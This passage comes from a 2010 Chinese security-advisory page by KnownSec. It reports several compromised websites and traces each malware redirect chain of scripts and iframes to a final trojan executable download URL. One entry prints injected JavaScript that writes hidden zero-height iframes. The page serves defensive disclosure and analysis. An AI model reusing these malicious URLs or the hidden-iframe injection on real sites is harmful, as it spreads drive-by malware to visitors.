………………[script]http://aet.bij.pl/44/if.swf
……………[iframe]http://aet.bij.pl/44/ie.html
………………[script]http://aet.bij.pl/44/if.swf
……………[iframe]http://aet.bij.pl/44/ff.html
……………[iframe]http://aet.bij.pl/44/ie.html
……………[iframe]http://aet.bij.pl/44/ff.html
……………[iframe]http://aet.bij.pl/44/ff.html
………[script]http://aet.bij.pl/44/1.js
…[script]http://hmi.xorg.pl/c.js?google_ad=03×031_ad
……[iframe]http://aet.bij.pl/44/945sd.htm
…[script]http://hnb.xorg.pl/c.js?google_ad=03×061_ad
……[iframe]http://aet.bij.pl/44/945sd.htm
…[script]http://hne.xorg.pl/c.js?google_ad=03×041_ad
……[iframe]http://aet.bij.pl/44/945sd.htm
…[script]http://js.users.51.la/1519677.js

最终下载病毒文件：
http://aet.bij.pl/l/nj.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 3% [?]

发 布 时 间 ：Fri Mar 05 18:53:48 2010
最后更新时间：Fri Mar 05 18:53:48 2010
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 乐趣网（http://www.netsh.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://xz.netsh.com/bbs/781374/html/table_28343500.html

挂马分析：
[root]http://xz.netsh.com/bbs/781374/html/table_28343500.html
…[script]http://www.crcf.org.cn/logo.gif?netsh
……[iframe]http://ferrari10.7766.org:1008/c039644/c03.htm
………[iframe]http://ferrari10.7766.org:1008/c039644/ps.htm
…………[script]http://ferrari10.7766.org:1008/c039644/c.js
…………[script]http://ferrari10.7766.org:1008/c039644/a.jpg
……………[exe]http://bbb.brsqb.cn:1688/c03.exe
…………[script]http://ferrari10.7766.org:1008/c039644/b.jpg

最终下载病毒文件：
http://bbb.brsqb.cn:1688/c03.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 3% [?]

发 布 时 间 ：Wed Mar 03 18:54:05 2010
最后更新时间：Wed Mar 03 18:54:05 2010
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 中国求职指南网（http://www.hao86.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.hao86.com/html/wow/4095.html

挂马分析：
[root]http://www.hao86.com/html/wow/4095.html
…[script]http://pagead07.googlesyndications.co.cc/data/backup/abc.png?XWVMNU
……[iframe]http://www.woiyu.com/Files/BeyondPic/new.htm?cctv
………[script]http://www.woiyu.com/Files/BeyondPic/whats.jpg
…………[exe]http://www.woiyu.com/Files/BeyondPic/r1.exe

最终下载病毒文件：
http://www.woiyu.com/Files/BeyondPic/r1.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 4% [?]

发 布 时 间 ：Sat Feb 27 18:57:27 2010
最后更新时间：Sat Feb 27 18:57:27 2010
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 52硬件（http://www.52hardware.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.52hardware.com/adv/20040315/10491.html

挂马分析：
[root]http://www.52hardware.com/adv/20040315/10491.html
…[script]http://pagead07.googlesyndications.co.cc/data/backup/css.png?RAB6RM
……[iframe]http://www.sat-china.com/wxds/2007/upme.htm?lo3ving
………[script]http://www.sat-china.com/wxds/2007/what.jpg?123
…………[exe]http://www.sat-china.com/wxds/2007/m.css
…[script]http://js.users.51.la/3369876.js

最终下载病毒文件：
http://www.sat-china.com/wxds/2007/m.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

发布时间：Mon Feb 22 2010 21:08:30 UTC+0800
最后更新时间：Mon Feb 22 2010 21:08:30 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 好耶广告（http://allyes.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://voit.allyes.com/xml/xml.js?ad_aimagic_750×169

挂马分析：
[root]http://voit.allyes.com/xml/xml.js?ad_aimagic_750×169
…[iframe]http://ferrari07.2288.org:801/c089644/c08.htm
……[iframe]http://ferrari07.2288.org:801/c089644/c.htm
………[script]http://ferrari07.2288.org:801/c089644/c.js
………[script]http://ferrari07.2288.org:801/c089644/a.jpg
…………[color=red][exe]http://sbl123.3322.org:8088/c08.exe[/color]
………[script]http://ferrari07.2288.org:801/c089644/b.jpg
…[iframe]http://ferrari07.2288.org:801/c089644/c08.htm
…[iframe]http://ferrari07.2288.org:801/c089644/c08.htm
…[iframe]http://ferrari07.2288.org:801/c089644/c08.htm
…[iframe]http://ferrari07.2288.org:801/c089644/c08.htm
…[iframe]http://ferrari07.2288.org:801/c089644/c08.htm
…[iframe]http://ferrari07.2288.org:801/c089644/c08.htm
…[iframe]http://ferrari07.2288.org:801/c089644/c08.htm
…[iframe]http://ferrari07.2288.org:801/c089644/c08.htm
…[iframe]http://google.08.cn/css/ad.html
…[iframe]http://google.08.cn/css/ad.html

最终下载病毒文件：
http://sbl123.3322.org:8088/c08.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 7% [?]

发布时间：Sat Feb 20 2010 20:40:30 UTC+0800
最后更新时间：Sat Feb 20 2010 20:40:30 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 成都大学（http://www.cdu.edu.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://xdxq.cdu.edu.cn/css/common.js

恶意代码：
document.writeln(”<iframe src=http://xdxq.cdu.edu.cn/flash/bottom.htm width=100 height=0></iframe>”);
document.writeln(”<iframe src=http://xdxq.cdu.edu.cn/flash/top.htm width=100 height=0></iframe>”);

挂马分析：
[root]http://xdxq.cdu.edu.cn/css/common.js
…[iframe]http://xdxq.cdu.edu.cn/flash/bottom.htm
……[exe]http://xdxq.cdu.edu.cn/flash/calc.exe
…[iframe]http://xdxq.cdu.edu.cn/flash/top.htm
……[exe]http://xdxq.cdu.edu.cn/flash/calc.exe

最终下载病毒文件：
http://xdxq.cdu.edu.cn/flash/calc.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 7% [?]